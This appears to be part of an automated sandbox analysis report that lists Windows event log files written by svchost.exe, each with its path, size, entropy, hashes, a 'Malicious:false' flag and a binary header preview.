                                                                                                                                                                                SSDEEP:384:Npa/hDGCyCkCzCRCFC0CPCqiCEBCzMCy2zCoFC9CKCPCryCaC6CyCU2sF2s2EY2L:Npa/dUwmgU
                                                                                                                                                                                MD5:39BDE2B4C029E5F2BC6FA244100ED55C
                                                                                                                                                                                SHA1:EE71625A1DDB5D57B606677AB384B794C2F76741
                                                                                                                                                                                SHA-256:DACAB8704BF60ED925B8F231A45A4F5A1CA9C87DED892940B518EACA1CDEE266
                                                                                                                                                                                SHA-512:909A4CE0385AD7D2936C2F73E69F20DFC438304778826AAAE9CEC176E1E10900557A6621608F7CA782CF5B098B98E195AAC432739F81112B12DEF9C0547BD50C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.U...............U...........................y.6R....................................................................?...................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F............................H..................f,..........&................................................x..............is......................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):4.4645121501987095
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:PrGJSsWdeBDBvwdvx8j00lDL0MBqQtcgVSyCV78AhurLyt2Q4eW+WzpzXepPvMog:PrGJSsWdeBDBvwdvx8j00lDL0MBqQtcU
                                                                                                                                                                                MD5:AF6B3AF3FEB5952B5CFA4A79A418228D
                                                                                                                                                                                SHA1:56B7AED9FC54B88B43EDEBBF35599F58610D3488
                                                                                                                                                                                SHA-256:4C33B557190EB5E003E3537736BEC0EB3B39A6435797B3B2E0B0440F25283A3A
                                                                                                                                                                                SHA-512:52F7304D50D66DDCF4B936F1089E8A6A56E5BD67037F6991D70A3DF6161C23F7A9D9954648CD4688EAA96ED45D4310822CB3107389B89244E9BC45340A90C98A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk......................................d..hf..........................................................................H.".................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...................................................................................................**................G.S..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):4.451556985804799
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:VM9QuTOc99zPb+zEbINH90Z5kLnOE8EGmwAOXKbGKszQW3XnT04Z6E2nhctHWkwJ:VM9QuTOc99zPb+zEbINd0Z5kLnOE8EGw
                                                                                                                                                                                MD5:296BC8869CCAEA17356C0CDB20FAD476
                                                                                                                                                                                SHA1:D7BCA51E318AE958F5ED37BD39CA87524F830D02
                                                                                                                                                                                SHA-256:7B1954FB93A90B84076DD63C054E25CF7B62EAB609E3C548BFE9581AB881F1CD
                                                                                                                                                                                SHA-512:8310823F544F73B0953378328EC8DA018115D7617320E1BA921DDA13199CAFB2A6806B32B80498D168CEC34BB3D2044C0A40D83F7B0E0A5E94BAD59416E6EB70
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.........................................8...............................................................................................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F........................................................................................................i..........A....g..1c...............k......**..............@v.YW..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):2.4123466903622734
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:vhZ7o7c7r7t7Q7A767/7U7r7W7A777kJ7q747i7T7L7H7P7p7c7/7v7E7iw7p7O6:v
                                                                                                                                                                                MD5:788B6B13BF6B1506C42A647C90C608FB
                                                                                                                                                                                SHA1:83A1DF28AAA9431F8BA98910622AB433633D5269
                                                                                                                                                                                SHA-256:E544869EE0C5829D15D7BFAF95679A6FF09D069B2752870866479980D4DECE5B
                                                                                                                                                                                SHA-512:6EE60DEE5B9E36106D7A654D241BC8CE2C84FC5DC663C43E270207EB84E4A6419BE19E00CBC6B530A7760F297BC56466619F5F6D17D9D7B8578CA937D3AD044A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.....................................Ps.. u...^......................................................................]bJ............................................=...........................................................................................................................f...............?...........................m...................M...F............................6...............1..k............................................................................4......................**..............|.FzT..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):2.3479804318728847
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:Ghc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauinw:G6Ovc0S5UyEeDgLcxq3gYi3
                                                                                                                                                                                MD5:20ABEDB128E5E464C3ADEDAFDD33AABD
                                                                                                                                                                                SHA1:008B5B5722E9F1C1FC3659745636DA9AC4BF3246
                                                                                                                                                                                SHA-256:E910DB6310307CE0E3D9AF315BB11B5118C3C82E2077D23CBB5204E604404D5F
                                                                                                                                                                                SHA-512:8710B94D7EA052FED9E34AAD859242ECAA44D2A21E7C4B8B3CE5BB0A38187D4F155981802A7EB34A931002BC9B841821EA4100F779EFAB52A9D95C69453352EC
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.........B...............B............v...x..........................................................................:m\.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................6^..................................................................w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):0.8478731703315486
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:chGuZumutu4uEu5uOuDuyb2uPu1uxuMDpu++uwKuDou13u:cO
                                                                                                                                                                                MD5:59AB0335EB19F6DD54860AACB86FD9CB
                                                                                                                                                                                SHA1:3E8217D9EE7123F81F7C87F00C27CFD908350941
                                                                                                                                                                                SHA-256:98E01AC5F79731DBD6E6ED4F39DDFA1A61F4D84E06BCDE28EFEB53D2CA949BEB
                                                                                                                                                                                SHA-512:A1B8B98385ACE44DD5B0F9314B7B647609CE122081BD3B06FB66F0BDB0C0970BFA7D8FA87C73AB2586716AEEA2DF7D209D716A094217FF6F93F1DDFF89243AAE
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk......................................$...&..6.5......................................................................./.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...............................................>...........&.......................................................................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):4.2240351571410395
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:5hHAxA+AAVA3A0Al9ABtuAbuAbhAbxAboAb5TAbZAbPAU2AWAEAbAJAOhbArnAVT:5uG1mDNqd1ZjCRpazcYu2t
                                                                                                                                                                                MD5:38BC36F8F4362404E333E07569271DD3
                                                                                                                                                                                SHA1:A10D1ED540B714D7DEE9300C094DB58B0F4AD018
                                                                                                                                                                                SHA-256:A7B49B3228A919E34A01B00F9C71958A4391F9FC94EDB3BCA46088A94AA99D59
                                                                                                                                                                                SHA-512:2F730C5EE594ECF1B0F8E545940AA18E801E61F17CFBD44D8C99C6ADD80E5C29944F679439A7A9B9E855BBD6295A4F20D5B8BB638505E2F9CE660DF919B23019
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.........................................(...a.GR....................................................................LY..................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................Um..................&...m\...........................................S..........................................]W......**..................U..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):3.769029143659816
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:4hnpg2TpJGpJfpJA3pJ9pJupJjpJkpJRpJapJfpJa5xpJxpJj+1pJQpJtpJAhpJT:45j5D+zAC
                                                                                                                                                                                MD5:20577B58222FB7BDEFC1300B21345286
                                                                                                                                                                                SHA1:AC97F48ACFF0FC27E1DA3A55C0322A9DF9ECB08A
                                                                                                                                                                                SHA-256:CDAC346E2CA13A1D8DE813E3574AD476A4071E25B8B4F919EBB24B38A0EF0C3A
                                                                                                                                                                                SHA-512:76B832469C31EE2EB6FCD6A5B96828BA84DA2FDEBC972E5C42092D71B61F932F0EB200F5B63BC1B41CA9E86536CFC7269FA909E90FB7899A206E3CD4F4DB15B1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.7.......D.......7.......D............9...=...T.^................................................................................................................@...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...................................................................................................**......7........qTUW..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):4.2293376553515465
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:ZhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBe:ZwDoh1VLHUO2hER7Mkf2q
                                                                                                                                                                                MD5:310A53947288CB6B830E117FED6CB431
                                                                                                                                                                                SHA1:9EF3CE4C8CF1C83613ADED2DFDEC20E886E9CA6D
                                                                                                                                                                                SHA-256:86C884F9E1E28CD0BE2F4B68DD247C8C76F9A2AA83EBD46A9B1380AF053A3D7F
                                                                                                                                                                                SHA-512:31F063C868A22CE873B40E3FC62661EACF67A5C0B40DD22412CF64924E7CA29CDF44317F5C8CD30524A5AD595531ACF71133943DDA072D81C07FEB62D0204521
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.\...............\............................N..........................................................................................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..^...........&...................................i...................................mS..............**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):1.2061151937932604
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:YhwCCRzCaCkClCzCYC/CyCVCGCMCvC3CcvCCC7CaCqCEC:YKFz
                                                                                                                                                                                MD5:70E70D2CB97D613C0C3E1EA1D74EAA92
                                                                                                                                                                                SHA1:73F3C23087DB31711E0851550188FDDD6F11B59A
                                                                                                                                                                                SHA-256:CCDF6F2CA947C96970A0B63EEC1F8CCD753549B2FC6CED8E0C0AB54BEE2AE027
                                                                                                                                                                                SHA-512:F1900F302272A5319682D7E4B3AA8911DE337EB4059FEB97FB5DD4E25078CB961DEB49C8FF273C82693C3B5867FD9247ED3F2D22AAB5F9F9361BF0CC4004523C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.....................................h6...8..3..........................................................................................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................v)............................................................................................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):78952
                                                                                                                                                                                Entropy (8bit):4.430344397647226
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:Nh9SeSlSvcxSZS7SOMUYsMBY8MdYSMdYQMdYeKLKGK6KQK2K1K52KaK7KlPKRKPX:NlcwQpI/llcN
                                                                                                                                                                                MD5:7A14ABCF4551C7BEB4C8A6C0F9C21C9A
                                                                                                                                                                                SHA1:6A9C78BD6196D8F4DE93056804D8EB693BC8A2DF
                                                                                                                                                                                SHA-256:440961B2ECD30DD676B4873CB6A47609183BC091C1D351321098F2B5BCBB5134
                                                                                                                                                                                SHA-512:37C0BE88DFCA4832C222000B28AE1889995ACC09B9CC1ED6D9D099E38BB6B239D18490E240A86D4EDD18F309BF8CE874F200FBDAB0ECDF1C9F779932867974AC
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.z"......."......z"......."..........P!...#..4.........................................................................+................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...............................................u...................................................**......z"......r)..W..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):1.2305573051374772
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:phL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmfPUmD+UmxUmBUmxUm:pY7LM
                                                                                                                                                                                MD5:38DDC0D6E2F296743CF4A3E22830F8ED
                                                                                                                                                                                SHA1:FAA40792E1A6F8AD8CD1EC6EC61E9C0232C20D11
                                                                                                                                                                                SHA-256:886F12875E0B1F98D5A61C42D96B95F0F8C992DC0F77E428B0CED2CC030913D2
                                                                                                                                                                                SHA-512:41C548C0D81C02855C71ACCDDCD8B75232459A5C405B94FAA7743495B142F9D1B7F10A7D2F47DB8845E1A5B4987D71BD4728A62B02CE14C248804460C2D32369
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.....................................04...6..lGz\.....................................................................@.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................*..................................................................................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):0.20408194875969177
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:MgX8WWzvrP+wTQNRBEZWTENO4bPBFoL/6a:jXyBUNVaO87oL/6a
                                                                                                                                                                                MD5:E6DBFB740365524EAA8431D272B58B0A
                                                                                                                                                                                SHA1:A0A8044BCB4F0CE74BC97B679949374E9C308D90
                                                                                                                                                                                SHA-256:8EC33CFDF5186455337851AC7516584799519E421F86DD7621A583B89593E330
                                                                                                                                                                                SHA-512:D8D44CD6A570387159A2EC042950B73D8B11180F0F2E27E43888A1D29A4C0EC7BEDC3A37EF646E9B3D928F5ABAB0F7F6A970815CB8A0747667F5BE9B35223051
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk..............................................<.......................................................................a,................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...................................................................................................**..............5HQ.W..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):4.081454356890361
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:OhMiv9i6ri+Hi7EibniWihKixiTijKiFi5iuiUioifiN8ixiEixihiliYi9niO8t:OfNa/xQM9QSp
                                                                                                                                                                                MD5:F38DD63F1596D1039571A5D80A147980
                                                                                                                                                                                SHA1:278553D5556ACBAF4E671C41F9A930CA0D253F11
                                                                                                                                                                                SHA-256:5AC3EDCEBF4CC25A645D62044E94FD695452E12A72D3500D98898E3F766C4875
                                                                                                                                                                                SHA-512:F6CE9DDF2D6888FB2DBB4C17544E632D8D5057B3C96577F70AD6F3B8EEA84274BFE092D94A0F3D2965DAD553209652AB5A28778C88DF9FDB5A8FA3E7D1EC8FFC
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.y...............y...................hv...x............................................................................?i................F....#......................=.......................#....................%..................N#...................................%......................f...............?.......................P.......................M...F...............................................v0..I%......v.......................................................................D...............**......y...........S...........g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):3.389134573891169
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:zhaon9a3aHaPabaHavaraXaTavabafavaDanaja/aLaHa/aHaj4EavaDanava/aS:5nI
                                                                                                                                                                                MD5:13C7CBFA759979C84C4BD8DF91D148D6
                                                                                                                                                                                SHA1:1D29C8F5C438174E738D49A7E015718325571366
                                                                                                                                                                                SHA-256:73F32D86C169B39E858959691EF71727B535C438C5D6125BC51F24BEE01AF4C8
                                                                                                                                                                                SHA-512:8A0E471FDE6AE77E9AB71585BE14E0673F63AD87803E67BE026D5FB93632B477CCDE0EE7AE5C06026E146FAE1FD45B8D5381F44537D40DE224B6D9AFFB477269
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.........@...............@...............h...\]........................................................................u................f...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................&...............................................................?...................................**..P..............W..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):1.4147866220767469
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:XhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJ3XJpyXJGXJQXJyXJbXJHXJZ:XQ0yUkNYwD8imLEJpmaYm9ZZ
                                                                                                                                                                                MD5:5AC69472258A06CCE6D64B90D882DD98
                                                                                                                                                                                SHA1:FE3AFF211337BBEDDF9E188F419495EDEED10F2D
                                                                                                                                                                                SHA-256:4E1ABC12F4354A38FB1B34228498C106713E751D06F206EFE76B1013DE3B09BD
                                                                                                                                                                                SHA-512:EC964437F5B9D0D3AB7CD4EB59C9B1215D22C244099C5F3EEFCB18F4B1F0EDC47FD38D3D83F0306136699C498BBBE3FE9C4489E976A7573DFE3E7427A5123A1E
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk......................................D...G...6.m.....................................................................>.................j...........................=...........................................................................................................................f...............?...........................m...................M...F................................................0..........&...........................................................C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
